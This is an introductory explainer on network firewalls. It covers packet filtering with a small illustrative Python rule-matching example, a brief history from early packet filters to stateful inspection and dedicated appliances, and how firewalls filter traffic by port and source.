A firewall is a network security device that monitors and filters incoming and outgoing network traffic according to your organization's previously established security policies. In essence, a firewall is the barrier that sits between your private internal network and the public Internet.

Packet filtering is a firewall technology used to monitor outgoing and incoming packets and control network access by allowing or stopping packets based on source and destination IP addresses, protocols, and ports.
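
In essence, a packet-filtering rule is a tuple match against those fields. A toy rule table might be evaluated like this (the addresses and the default-deny policy are illustrative):

    # Each rule: (source prefix, destination port, protocol, action).
    RULES = [
        ("10.0.0.",  22, "tcp", "allow"),  # SSH from the internal network
        ("",        443, "tcp", "allow"),  # HTTPS from anywhere
    ]

    def filter_packet(src_ip: str, dst_port: int, proto: str) -> str:
        """Return the action of the first matching rule, default deny."""
        for prefix, port, rule_proto, action in RULES:
            if src_ip.startswith(prefix) and dst_port == port and proto == rule_proto:
                return action
        return "deny"  # default-deny policy

    print(filter_packet("10.0.0.5", 22, "tcp"))     # allow
    print(filter_packet("203.0.113.7", 23, "tcp"))  # deny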

Firewalls have been the first and most reliable line of defense in network security for over 30 years. Firewalls first appeared in the late 1980s as packet filters: these were little more than network devices sitting between computers, and their main function was to inspect the packets, or bytes, exchanged between machines. Although firewalls have grown far more sophisticated through ongoing development, packet filter firewalls are still used in legacy systems. As the technology matured, Gil Shwed of Check Point introduced the first stateful inspection firewall in 1993, named FireWall-1. In 2000, Netscreen released a dedicated firewall appliance; with faster throughput, lower latency, and lower cost, dedicated appliances became popular and were quickly adopted by businesses.

How does a firewall protect a network?

A firewall system analyzes network traffic against predefined rules. It then filters the traffic, blocking anything that comes from untrusted or suspicious sources and allowing only the inbound traffic it is configured to accept. Normally, a firewall intercepts network traffic at a computer's entry points, called ports, and allows or blocks specific data packets (units of communication sent over a digital network) based on pre-established security rules. Inbound traffic is permitted only from trusted IP addresses and sources.
